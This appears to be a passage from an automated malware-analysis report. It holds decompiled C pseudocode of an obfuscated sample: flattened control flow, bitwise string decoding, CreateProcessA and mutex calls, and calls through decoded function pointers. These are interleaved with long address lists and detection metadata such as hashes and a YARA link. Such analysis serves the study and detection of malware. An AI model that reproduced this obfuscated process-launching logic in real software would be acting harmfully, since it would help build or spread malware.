							_t111 = _t201;
							__eflags = _t201 - 0x187c6430;
							if(_t201 != 0x187c6430) {
								continue;
							} else {
								_t262 = 1;
								r8d = 0x510b3a3e;
								r9d = 0x5c;
								E005CFAD7(1, _t269, _t283, _t292);
								 *_t283();
								goto L107;
							}
						} else {
							__eflags = _t201 - 0x79849ad;
							if(_t201 > 0x79849ad) {
								__eflags = _t201 - 0x79849ae;
								if(_t201 == 0x79849ae) {
									_t111 = 0x63da8ac0;
									_v124 = 0x7530;
								} else {
									__eflags = _t201 - 0xd4e563f;
									if(_t201 == 0xd4e563f) {
										_t269 = 0;
										_t111 = _t271;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0xe1b9813;
										if(_t201 == 0xe1b9813) {
											__eflags = _v160 - 8;
											_t111 =  <  ? 0xbf82bb62 : 0xfbdae760;
										}
									}
								}
							} else {
								__eflags = _t201 - 0xf29a3544;
								if(_t201 == 0xf29a3544) {
									__eflags = (_t269 ^ 0x000000fe) & sil;
									_t111 =  ==  ? 0x28c5e58b : 0x854a966f;
								} else {
									__eflags = _t201 - 0xfbdae760;
									if(_t201 == 0xfbdae760) {
										__eflags = _v160 - 0x40;
										_t111 =  <  ? 0xc7704248 : 0x18cf248c;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0x701b759;
										if(_t201 == 0x701b759) {
											_t269 = 0;
											_t111 = _v88;
										}
									}
								}
							}
							continue;
						}
					}
				}
			}



































                                                                                                                                                        0x005d02a4
                                                                                                                                                        0x005d02a4
                                                                                                                                                        0x005d02a4
                                                                                                                                                        0x005d02a4
                                                                                                                                                        0x005d02a4
                                                                                                                                                        0x005d02a4
                                                                                                                                                        0x005d02a4
                                                                                                                                                        0x005d02b7
                                                                                                                                                        0x005d02c6
                                                                                                                                                        0x005d02cc
                                                                                                                                                        0x005d02d7
                                                                                                                                                        0x005d02db
                                                                                                                                                        0x005d02e6
                                                                                                                                                        0x005d02e9
                                                                                                                                                        0x005d02f2
                                                                                                                                                        0x005d02f6
                                                                                                                                                        0x005d02fa
                                                                                                                                                        0x005d0305
                                                                                                                                                        0x005d0309
                                                                                                                                                        0x005d030e
                                                                                                                                                        0x005d0313
                                                                                                                                                        0x005d0313
                                                                                                                                                        0x005d0313
                                                                                                                                                        0x005d0318
                                                                                                                                                        0x005d0318
                                                                                                                                                        0x005d0318
                                                                                                                                                        0x005d031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0321
                                                                                                                                                        0x005d0327
                                                                                                                                                        0x005d03d2
                                                                                                                                                        0x005d03d8
                                                                                                                                                        0x005d04b1
                                                                                                                                                        0x005d04b7
                                                                                                                                                        0x005d0656
                                                                                                                                                        0x005d065c
                                                                                                                                                        0x005d0a72
                                                                                                                                                        0x005d0a77
                                                                                                                                                        0x005d0a7c
                                                                                                                                                        0x005d0a81
                                                                                                                                                        0x005d0a8d
                                                                                                                                                        0x005d0a93
                                                                                                                                                        0x005d0a99
                                                                                                                                                        0x005d0aa0
                                                                                                                                                        0x005d0aa2
                                                                                                                                                        0x005d0abe
                                                                                                                                                        0x005d0ac4
                                                                                                                                                        0x005d0aca
                                                                                                                                                        0x005d0acf
                                                                                                                                                        0x005d0ad8
                                                                                                                                                        0x005d0ade
                                                                                                                                                        0x005d0ae4
                                                                                                                                                        0x005d0aef
                                                                                                                                                        0x005d0af6
                                                                                                                                                        0x005d0af9
                                                                                                                                                        0x005d0b01
                                                                                                                                                        0x005d0b04
                                                                                                                                                        0x005d0b13
                                                                                                                                                        0x005d0662
                                                                                                                                                        0x005d0662
                                                                                                                                                        0x005d0668
                                                                                                                                                        0x005d0b1b
                                                                                                                                                        0x005d0b24
                                                                                                                                                        0x005d0b33
                                                                                                                                                        0x005d066e
                                                                                                                                                        0x005d066e
                                                                                                                                                        0x005d0670
                                                                                                                                                        0x005d0676
                                                                                                                                                        0x005d067c
                                                                                                                                                        0x005d0684
                                                                                                                                                        0x005d0684
                                                                                                                                                        0x005d0676
                                                                                                                                                        0x005d0668
                                                                                                                                                        0x005d0318
                                                                                                                                                        0x005d0318
                                                                                                                                                        0x005d0318
                                                                                                                                                        0x005d031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d031f
                                                                                                                                                        0x005d0318
                                                                                                                                                        0x005d04bd
                                                                                                                                                        0x005d04c3
                                                                                                                                                        0x005d0931
                                                                                                                                                        0x005d0936
                                                                                                                                                        0x005d0b60
                                                                                                                                                        0x005d0b60
                                                                                                                                                        0x005d0318
                                                                                                                                                        0x005d0318
                                                                                                                                                        0x005d0318
                                                                                                                                                        0x005d031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0318
                                                                                                                                                        0x005d04c9
                                                                                                                                                        0x005d04cf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d04d5
                                                                                                                                                        0x005d04d5
                                                                                                                                                        0x005d04d7
                                                                                                                                                        0x005d04dd
                                                                                                                                                        0x005d04e3
                                                                                                                                                        0x005d04e8
                                                                                                                                                        0x005d04ec
                                                                                                                                                        0x005d04ec
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d04dd
                                                                                                                                                        0x005d04cf
                                                                                                                                                        0x005d03de
                                                                                                                                                        0x005d03e4
                                                                                                                                                        0x005d05e8
                                                                                                                                                        0x005d05ee
                                                                                                                                                        0x005d0a2b
                                                                                                                                                        0x005d0a3a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0a3a
                                                                                                                                                        0x005d05f4
                                                                                                                                                        0x005d05fa
                                                                                                                                                        0x005d0a42
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0a42
                                                                                                                                                        0x005d0600
                                                                                                                                                        0x005d0602
                                                                                                                                                        0x005d0608
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d060e
                                                                                                                                                        0x005d0618
                                                                                                                                                        0x005d061a
                                                                                                                                                        0x005d0bc8
                                                                                                                                                        0x005d0bcd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0bcd
                                                                                                                                                        0x005d03ea
                                                                                                                                                        0x005d03f0
                                                                                                                                                        0x005d085c
                                                                                                                                                        0x005d087f
                                                                                                                                                        0x005d08a1
                                                                                                                                                        0x005d08af
                                                                                                                                                        0x005d08b3
                                                                                                                                                        0x005d08b8
                                                                                                                                                        0x005d08bc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d08bc
                                                                                                                                                        0x005d03f6
                                                                                                                                                        0x005d03fc
                                                                                                                                                        0x005d08ca
                                                                                                                                                        0x005d08d7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d08d7
                                                                                                                                                        0x005d0402
                                                                                                                                                        0x005d0404
                                                                                                                                                        0x005d040a
                                                                                                                                                        0x005d0c2a
                                                                                                                                                        0x005d0410
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0410
                                                                                                                                                        0x005d040a
                                                                                                                                                        0x005d0333
                                                                                                                                                        0x005d0473
                                                                                                                                                        0x005d0479
                                                                                                                                                        0x005d0624
                                                                                                                                                        0x005d062a
                                                                                                                                                        0x005d0a50
                                                                                                                                                        0x005d0a58
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0a58
                                                                                                                                                        0x005d0630
                                                                                                                                                        0x005d0636
                                                                                                                                                        0x005d0a60
                                                                                                                                                        0x005d0a65
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0a65
                                                                                                                                                        0x005d063c
                                                                                                                                                        0x005d063e
                                                                                                                                                        0x005d0644
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d064e
                                                                                                                                                        0x005d09f9
                                                                                                                                                        0x005d09fe
                                                                                                                                                        0x005d047f
                                                                                                                                                        0x005d047f
                                                                                                                                                        0x005d0482
                                                                                                                                                        0x005d0488
                                                                                                                                                        0x005d048e
                                                                                                                                                        0x005d0494
                                                                                                                                                        0x005d0924
                                                                                                                                                        0x005d0927
                                                                                                                                                        0x005d049a
                                                                                                                                                        0x005d049a
                                                                                                                                                        0x005d049c
                                                                                                                                                        0x005d04a2
                                                                                                                                                        0x005d04a8
                                                                                                                                                        0x005d04a8
                                                                                                                                                        0x005d04a2
                                                                                                                                                        0x005d0494
                                                                                                                                                        0x005d0488
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0479
                                                                                                                                                        0x005d033f
                                                                                                                                                        0x005d05ad
                                                                                                                                                        0x005d05b3
                                                                                                                                                        0x005d09f6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d09f6
                                                                                                                                                        0x005d05b9
                                                                                                                                                        0x005d05bf
                                                                                                                                                        0x005d0a0a
                                                                                                                                                        0x005d0a17
                                                                                                                                                        0x005d05c5
                                                                                                                                                        0x005d05c5
                                                                                                                                                        0x005d05c7
                                                                                                                                                        0x005d05cd
                                                                                                                                                        0x005d05d3
                                                                                                                                                        0x005d05da
                                                                                                                                                        0x005d05de
                                                                                                                                                        0x005d05de
                                                                                                                                                        0x005d05cd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d05bf
                                                                                                                                                        0x005d034b
                                                                                                                                                        0x005d0788
                                                                                                                                                        0x005d078e
                                                                                                                                                        0x005d0bd5
                                                                                                                                                        0x005d0bd7
                                                                                                                                                        0x005d0bdd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0c30
                                                                                                                                                        0x005d0c37
                                                                                                                                                        0x005d0c3c
                                                                                                                                                        0x005d0c3e
                                                                                                                                                        0x005d0c3e
                                                                                                                                                        0x005d079b
                                                                                                                                                        0x005d07a0
                                                                                                                                                        0x005d07a8
                                                                                                                                                        0x005d07b4
                                                                                                                                                        0x005d07b9
                                                                                                                                                        0x005d07bf
                                                                                                                                                        0x005d07c5
                                                                                                                                                        0x005d07ca
                                                                                                                                                        0x005d07d0
                                                                                                                                                        0x005d07d7
                                                                                                                                                        0x005d07da
                                                                                                                                                        0x005d07df
                                                                                                                                                        0x005d07e1
                                                                                                                                                        0x005d07e6
                                                                                                                                                        0x005d07f7
                                                                                                                                                        0x005d0351
                                                                                                                                                        0x005d0357
                                                                                                                                                        0x005d07ff
                                                                                                                                                        0x005d0804
                                                                                                                                                        0x005d035d
                                                                                                                                                        0x005d035d
                                                                                                                                                        0x005d0365
                                                                                                                                                        0x005d0378
                                                                                                                                                        0x005d0378
                                                                                                                                                        0x005d0365
                                                                                                                                                        0x005d0357
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d037d
                                                                                                                                                        0x005d037d
                                                                                                                                                        0x005d0383
                                                                                                                                                        0x005d0415
                                                                                                                                                        0x005d041b
                                                                                                                                                        0x005d054c
                                                                                                                                                        0x005d0552
                                                                                                                                                        0x005d074b
                                                                                                                                                        0x005d0751
                                                                                                                                                        0x005d0ba2
                                                                                                                                                        0x005d0baf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0baf
                                                                                                                                                        0x005d0757
                                                                                                                                                        0x005d075d
                                                                                                                                                        0x005d0bb7
                                                                                                                                                        0x005d0bc1
                                                                                                                                                        0x005d0bc3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0bc3
                                                                                                                                                        0x005d0763
                                                                                                                                                        0x005d0765
                                                                                                                                                        0x005d076b
                                                                                                                                                        0x005d0771
                                                                                                                                                        0x005d0780
                                                                                                                                                        0x005d0780
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d076b
                                                                                                                                                        0x005d0558
                                                                                                                                                        0x005d055e
                                                                                                                                                        0x005d0969
                                                                                                                                                        0x005d096e
                                                                                                                                                        0x005d0974
                                                                                                                                                        0x005d097a
                                                                                                                                                        0x005d0984
                                                                                                                                                        0x005d0986
                                                                                                                                                        0x005d0564
                                                                                                                                                        0x005d0564
                                                                                                                                                        0x005d056a
                                                                                                                                                        0x005d0997
                                                                                                                                                        0x005d099d
                                                                                                                                                        0x005d09a3
                                                                                                                                                        0x005d09ae
                                                                                                                                                        0x005d09b5
                                                                                                                                                        0x005d09ba
                                                                                                                                                        0x005d09c9
                                                                                                                                                        0x005d09d6
                                                                                                                                                        0x005d09de
                                                                                                                                                        0x005d09ea
                                                                                                                                                        0x005d0570
                                                                                                                                                        0x005d0570
                                                                                                                                                        0x005d0572
                                                                                                                                                        0x005d0578
                                                                                                                                                        0x005d058b
                                                                                                                                                        0x005d059f
                                                                                                                                                        0x005d05a3
                                                                                                                                                        0x005d05a3
                                                                                                                                                        0x005d0578
                                                                                                                                                        0x005d056a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d055e
                                                                                                                                                        0x005d0421
                                                                                                                                                        0x005d0427
                                                                                                                                                        0x005d06cc
                                                                                                                                                        0x005d06d2
                                                                                                                                                        0x005d0c0b
                                                                                                                                                        0x005d0313
                                                                                                                                                        0x005d0313
                                                                                                                                                        0x005d0313
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0313
                                                                                                                                                        0x005d0313
                                                                                                                                                        0x005d06d8
                                                                                                                                                        0x005d06de
                                                                                                                                                        0x005d0b56
                                                                                                                                                        0x005d0b5b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0b5b
                                                                                                                                                        0x005d06e4
                                                                                                                                                        0x005d06e6
                                                                                                                                                        0x005d06ec
                                                                                                                                                        0x005d06f2
                                                                                                                                                        0x005d0701
                                                                                                                                                        0x005d0701
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d06ec
                                                                                                                                                        0x005d042d
                                                                                                                                                        0x005d0433
                                                                                                                                                        0x005d08e4
                                                                                                                                                        0x005d08e9
                                                                                                                                                        0x005d08ee
                                                                                                                                                        0x005d08f3
                                                                                                                                                        0x005d08f8
                                                                                                                                                        0x005d090a
                                                                                                                                                        0x005d090f
                                                                                                                                                        0x005d0916
                                                                                                                                                        0x005d091a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d091a
                                                                                                                                                        0x005d0439
                                                                                                                                                        0x005d043f
                                                                                                                                                        0x005d0be5
                                                                                                                                                        0x005d0bed
                                                                                                                                                        0x005d0bf4
                                                                                                                                                        0x005d0c01
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0445
                                                                                                                                                        0x005d0445
                                                                                                                                                        0x005d0447
                                                                                                                                                        0x005d044d
                                                                                                                                                        0x005d0453
                                                                                                                                                        0x005d045c
                                                                                                                                                        0x005d046b
                                                                                                                                                        0x005d046b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d044d
                                                                                                                                                        0x005d043f
                                                                                                                                                        0x005d0389
                                                                                                                                                        0x005d038f
                                                                                                                                                        0x005d04f6
                                                                                                                                                        0x005d04fc
                                                                                                                                                        0x005d0709
                                                                                                                                                        0x005d070f
                                                                                                                                                        0x005d0b6e
                                                                                                                                                        0x005d0b7b
                                                                                                                                                        0x005d0715
                                                                                                                                                        0x005d0715
                                                                                                                                                        0x005d071b
                                                                                                                                                        0x005d0b88
                                                                                                                                                        0x005d0b8d
                                                                                                                                                        0x005d0b92
                                                                                                                                                        0x005d0b97
                                                                                                                                                        0x005d0721
                                                                                                                                                        0x005d0721
                                                                                                                                                        0x005d0723
                                                                                                                                                        0x005d0729
                                                                                                                                                        0x005d072f
                                                                                                                                                        0x005d0732
                                                                                                                                                        0x005d0737
                                                                                                                                                        0x005d073c
                                                                                                                                                        0x005d0741
                                                                                                                                                        0x005d0741
                                                                                                                                                        0x005d0729
                                                                                                                                                        0x005d071b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d070f
                                                                                                                                                        0x005d0502
                                                                                                                                                        0x005d0508
                                                                                                                                                        0x005d0944
                                                                                                                                                        0x005d0951
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0951
                                                                                                                                                        0x005d050e
                                                                                                                                                        0x005d0514
                                                                                                                                                        0x005d0959
                                                                                                                                                        0x005d095e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d095e
                                                                                                                                                        0x005d051a
                                                                                                                                                        0x005d051c
                                                                                                                                                        0x005d0522
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0528
                                                                                                                                                        0x005d052a
                                                                                                                                                        0x005d052f
                                                                                                                                                        0x005d0535
                                                                                                                                                        0x005d053b
                                                                                                                                                        0x005d0545
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d0545
                                                                                                                                                        0x005d0395
                                                                                                                                                        0x005d0395
                                                                                                                                                        0x005d039b
                                                                                                                                                        0x005d068d
                                                                                                                                                        0x005d0693
                                                                                                                                                        0x005d0b3b
                                                                                                                                                        0x005d0b40
                                                                                                                                                        0x005d0699
                                                                                                                                                        0x005d0699
                                                                                                                                                        0x005d069f
                                                                                                                                                        0x005d0b4d
                                                                                                                                                        0x005d0b4f
                                                                                                                                                        0x005d06a5
                                                                                                                                                        0x005d06a5
                                                                                                                                                        0x005d06a7
                                                                                                                                                        0x005d06ad
                                                                                                                                                        0x005d06b7
                                                                                                                                                        0x005d06c4
                                                                                                                                                        0x005d06c4
                                                                                                                                                        0x005d06ad
                                                                                                                                                        0x005d069f
                                                                                                                                                        0x005d03a1
                                                                                                                                                        0x005d03a1
                                                                                                                                                        0x005d03a7
                                                                                                                                                        0x005d0815
                                                                                                                                                        0x005d0822
                                                                                                                                                        0x005d03ad
                                                                                                                                                        0x005d03ad
                                                                                                                                                        0x005d03b3
                                                                                                                                                        0x005d082e
                                                                                                                                                        0x005d083b
                                                                                                                                                        0x005d03b9
                                                                                                                                                        0x005d03b9
                                                                                                                                                        0x005d03bb
                                                                                                                                                        0x005d03c1
                                                                                                                                                        0x005d03c7
                                                                                                                                                        0x005d03c9
                                                                                                                                                        0x005d03c9
                                                                                                                                                        0x005d03c1
                                                                                                                                                        0x005d03b3
                                                                                                                                                        0x005d03a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005d039b
                                                                                                                                                        0x005d038f
                                                                                                                                                        0x005d0318

                                                                                                                                                        APIs
                                                                                                                                                        • SleepEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,FD91BC21), ref: 005D09AE
                                                                                                                                                          • Part of subcall function 005C3A22: CreateMutexExA.KERNEL32(?,?,?,079849AE,0701B759,005D09DE), ref: 005C3A4E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.399411659.00000000005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.399402581.00000000005C0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399473393.00000000005D4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399490424.00000000005D7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                        • String ID: 0u$?VN$?VN$c/9$c/9$Ug$Ug
                                                                                                                                                        • API String ID: 1464230837-3375559661
                                                                                                                                                        • Opcode ID: 6b69fe40e889eeef2de17b3194c4735dd1379a6845d9a8b4328103bb9d698c9b
                                                                                                                                                        • Instruction ID: 19a41cfcb842c66d107ee59cb5c35269d083538fa162d575e0579a4c61476532
                                                                                                                                                        • Opcode Fuzzy Hash: 6b69fe40e889eeef2de17b3194c4735dd1379a6845d9a8b4328103bb9d698c9b
                                                                                                                                                        • Instruction Fuzzy Hash: E412D3717192458BCB7C875C94A473E6A91FBC9744F60251FFA4BCBBA4DA28CC408F46
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C8282, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 192processCOMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 42%
                                                                                                                                                        			E005C8282(signed long long __rax, signed long long __rcx, void* __rdx, void* __r9) {
				void* _t50;
				void* _t71;
				signed int _t82;
				signed int _t86;
				signed int _t91;
				void* _t101;
				void* _t102;
				signed long long _t112;
				long long* _t113;
				signed long long _t114;
				signed long long _t118;
				signed long long _t119;
				void* _t122;
				void* _t123;
				void* _t125;
				void* _t128;
				void* _t129;

				_t116 = __rdx;
				_t114 = __rcx;
				_t112 = __rax;
				asm("movaps [esp+0x70], xmm6");
				_t128 = __r9;
				_t103 = r8d;
				_t129 = __rdx;
				E005C3998(__rcx);
				_t1 = _t122 + 0x50; // 0xff390cf0
				_t118 = _t1 | _t112;
				_t101 =  ==  ? 0x11a1a452 : 0x7de529e8;
				_t50 = 0x2b8f7bbc;
				asm("xorps xmm6, xmm6");
				while(1) {
					L1:
					_t71 = _t50;
					if(_t50 <= 0x2b8f7bbb) {
						break;
					}
					if(_t71 > 0x7de529e7) {
						if(_t71 == 0x7de529e8) {
							 *(_t122 + 0x50) = 0;
							 *((intOrPtr*)(_t122 + 0x54)) = 0x69d0435b;
							 *((intOrPtr*)(_t122 + 0x58)) = 0x69d01959;
							 *((intOrPtr*)(_t122 + 0x5c)) = 0x5b43759;
							if( *(_t122 + 0x50) == 0) {
								do {
									_t91 =  *(_t122 + 0x50 + _t112 * 4);
									_t103 =  !_t91 & 0x05b43735;
									 *(_t122 + 0x50 + _t112 * 4) = _t91 & 0xfa4bc8ca |  !_t91 & 0x05b43735;
									_t114 = _t114 + 1;
									_t112 = _t112 + 1;
								} while (_t112 != 4);
							}
							_t114 = _t118;
							E005C1517(_t101, _t114, _t116, _t123, _t125);
							_t50 =  ==  ? 0x7df23ede : 0x3df03fa4;
						} else {
							_t50 = _t71;
							if(_t71 == 0x7df23ede) {
								 *(_t122 + 0x50) = 0;
								 *((intOrPtr*)(_t122 + 0x54)) = 0x7139785;
								 *((intOrPtr*)(_t122 + 0x58)) = 0x29128283;
								if( *(_t122 + 0x50) == 0) {
									do {
										_t82 =  *(_t122 + 0x54 + _t112 * 4);
										_t96 =  !_t82 & 0x0eb19f8e;
										 *(_t122 + 0x54 + _t112 * 4) = (_t82 & 0xf14e6071 |  !_t82 & 0x0eb19f8e) ^ 0x27c66568;
									} while (_t112 == 0);
								}
								L23:
								_t50 = 0x9f3e05ed;
							}
						}
						continue;
						L32:
					}
					_t50 = _t101;
					if(_t71 == 0x2b8f7bbc) {
						continue;
					}
					if(_t71 == 0x3df03fa4) {
						 *(_t122 + 0x50) = 0;
						 *((intOrPtr*)(_t122 + 0x54)) = 0x16e400f6;
						 *((intOrPtr*)(_t122 + 0x58)) = 0x8f10afc;
						 *((intOrPtr*)(_t122 + 0x5c)) = 0x1fec1dbd;
						 *((intOrPtr*)(_t122 + 0x60)) = 0x7a947893;
						if( *(_t122 + 0x50) == 0) {
							do {
								_t86 =  *(_t122 + 0x54 + _t112 * 4);
								_t96 =  !_t86 & 0x7a947893;
								 *(_t122 + 0x54 + _t112 * 4) = _t86 & 0x856b876c |  !_t86 & 0x7a947893;
								_t112 = _t112 + 1;
							} while (_t112 != 4);
						}
						goto L23;
					}
					_t50 = _t71;
					if(_t71 != 0x2de3212c) {
						continue;
					}
					asm("movaps xmm6, [esp+0x70]");
					return _t50;
					goto L32;
				}
				if(_t71 > 0x11a1a451) {
					if(_t71 == 0x11a1a452) {
						E005CCDB9(0x68, _t112);
						_t119 = _t112;
						E005CCDB9(8, _t112);
						 *(_t122 + 0x68) = _t112;
						 *_t119 = 0x68;
						 *(_t119 + 0x3c) = 1;
						 *((short*)(_t119 + 0x40)) = 0;
						r8d = 0x2bf91925;
						r9d = 0x3c;
						E005CFAD7(1, _t102, _t112, _t114);
						 *((long long*)(_t122 + 0x48)) =  *(_t122 + 0x68);
						 *(_t122 + 0x40) = _t119;
						asm("movups [esp+0x30], xmm6");
						 *((intOrPtr*)(_t122 + 0x28)) = 0x8000000;
						 *((intOrPtr*)(_t122 + 0x20)) = 0;
						_t116 = _t129;
						r8d = 0;
						r9d = 0; // executed
						CreateProcessA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??); // executed
						_t50 =  ==  ? 0x21139ce2 : 0xfa4d7a7c;
						goto L1;
					} else {
						_t50 = _t71;
						if(_t71 != 0x21139ce2) {
							goto L1;
						} else {
							goto L25;
						}
					}
				} else {
					if(_t71 == 0x9f3e05ed) {
						_t114 = _t118;
						_t116 = _t128;
						E005D0CE8(0, _t96, _t101, _t102, _t103, _t112, _t114, _t128, _t123);
						L25:
						_t50 = 0x2de3212c;
					} else {
						_t50 = _t71;
						if(_t71 == 0xfa4d7a7c) {
							_t113 =  *(_t122 + 0x68);
							r8d = 0x2db58ff7;
							r9d = 0x11;
							E005CFAD7(1, _t102, _t113, _t114);
							 *_t113();
							_t112 =  *(_t122 + 0x68);
							_t96 = 1;
							r8d = 0x2db58ff7;
							r9d = 0x11;
							E005CFAD7(1, _t102, _t112,  *((intOrPtr*)(_t113 + 8)));
							_t114 =  *_t112;
							 *_t112();
							_t50 = 0x21139ce2;
						}
					}
					goto L1;
				}
				goto L32;
			}




















                                                                                                                                                        0x005c8282
                                                                                                                                                        0x005c8282
                                                                                                                                                        0x005c8282
                                                                                                                                                        0x005c8295
                                                                                                                                                        0x005c829a
                                                                                                                                                        0x005c829d
                                                                                                                                                        0x005c82a0
                                                                                                                                                        0x005c82a6
                                                                                                                                                        0x005c82b0
                                                                                                                                                        0x005c82b5
                                                                                                                                                        0x005c82c4
                                                                                                                                                        0x005c82c7
                                                                                                                                                        0x005c82ce
                                                                                                                                                        0x005c82d1
                                                                                                                                                        0x005c82d1
                                                                                                                                                        0x005c82d1
                                                                                                                                                        0x005c82d8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c82e0
                                                                                                                                                        0x005c8388
                                                                                                                                                        0x005c8472
                                                                                                                                                        0x005c8476
                                                                                                                                                        0x005c847e
                                                                                                                                                        0x005c8486
                                                                                                                                                        0x005c8492
                                                                                                                                                        0x005c849b
                                                                                                                                                        0x005c849b
                                                                                                                                                        0x005c84a3
                                                                                                                                                        0x005c84b1
                                                                                                                                                        0x005c84b5
                                                                                                                                                        0x005c84b8
                                                                                                                                                        0x005c84bb
                                                                                                                                                        0x005c849b
                                                                                                                                                        0x005c84c1
                                                                                                                                                        0x005c84c6
                                                                                                                                                        0x005c84e9
                                                                                                                                                        0x005c838e
                                                                                                                                                        0x005c838e
                                                                                                                                                        0x005c8396
                                                                                                                                                        0x005c839c
                                                                                                                                                        0x005c83a0
                                                                                                                                                        0x005c83a8
                                                                                                                                                        0x005c83b4
                                                                                                                                                        0x005c83bc
                                                                                                                                                        0x005c83bc
                                                                                                                                                        0x005c83c4
                                                                                                                                                        0x005c83d8
                                                                                                                                                        0x005c83df
                                                                                                                                                        0x005c83e6
                                                                                                                                                        0x005c8453
                                                                                                                                                        0x005c8453
                                                                                                                                                        0x005c8453
                                                                                                                                                        0x005c8396
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c8388
                                                                                                                                                        0x005c82e6
                                                                                                                                                        0x005c82ee
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c82f6
                                                                                                                                                        0x005c8404
                                                                                                                                                        0x005c8408
                                                                                                                                                        0x005c8410
                                                                                                                                                        0x005c8418
                                                                                                                                                        0x005c8420
                                                                                                                                                        0x005c842c
                                                                                                                                                        0x005c8430
                                                                                                                                                        0x005c8430
                                                                                                                                                        0x005c8438
                                                                                                                                                        0x005c8446
                                                                                                                                                        0x005c844a
                                                                                                                                                        0x005c844d
                                                                                                                                                        0x005c8430
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c842c
                                                                                                                                                        0x005c82fc
                                                                                                                                                        0x005c8304
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c857f
                                                                                                                                                        0x005c8597
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c8597
                                                                                                                                                        0x005c8311
                                                                                                                                                        0x005c83ee
                                                                                                                                                        0x005c84f6
                                                                                                                                                        0x005c84fb
                                                                                                                                                        0x005c8503
                                                                                                                                                        0x005c8508
                                                                                                                                                        0x005c850d
                                                                                                                                                        0x005c8514
                                                                                                                                                        0x005c851b
                                                                                                                                                        0x005c852d
                                                                                                                                                        0x005c8533
                                                                                                                                                        0x005c8539
                                                                                                                                                        0x005c853e
                                                                                                                                                        0x005c8543
                                                                                                                                                        0x005c8548
                                                                                                                                                        0x005c854d
                                                                                                                                                        0x005c8555
                                                                                                                                                        0x005c855f
                                                                                                                                                        0x005c8562
                                                                                                                                                        0x005c8565
                                                                                                                                                        0x005c8568
                                                                                                                                                        0x005c8577
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c83f4
                                                                                                                                                        0x005c83f4
                                                                                                                                                        0x005c83fc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c8402
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c8402
                                                                                                                                                        0x005c83fc
                                                                                                                                                        0x005c8317
                                                                                                                                                        0x005c831d
                                                                                                                                                        0x005c845d
                                                                                                                                                        0x005c8460
                                                                                                                                                        0x005c8463
                                                                                                                                                        0x005c8468
                                                                                                                                                        0x005c8468
                                                                                                                                                        0x005c8323
                                                                                                                                                        0x005c8323
                                                                                                                                                        0x005c832b
                                                                                                                                                        0x005c832d
                                                                                                                                                        0x005c833d
                                                                                                                                                        0x005c8343
                                                                                                                                                        0x005c8349
                                                                                                                                                        0x005c8351
                                                                                                                                                        0x005c8353
                                                                                                                                                        0x005c835d
                                                                                                                                                        0x005c8362
                                                                                                                                                        0x005c8368
                                                                                                                                                        0x005c836e
                                                                                                                                                        0x005c8373
                                                                                                                                                        0x005c8376
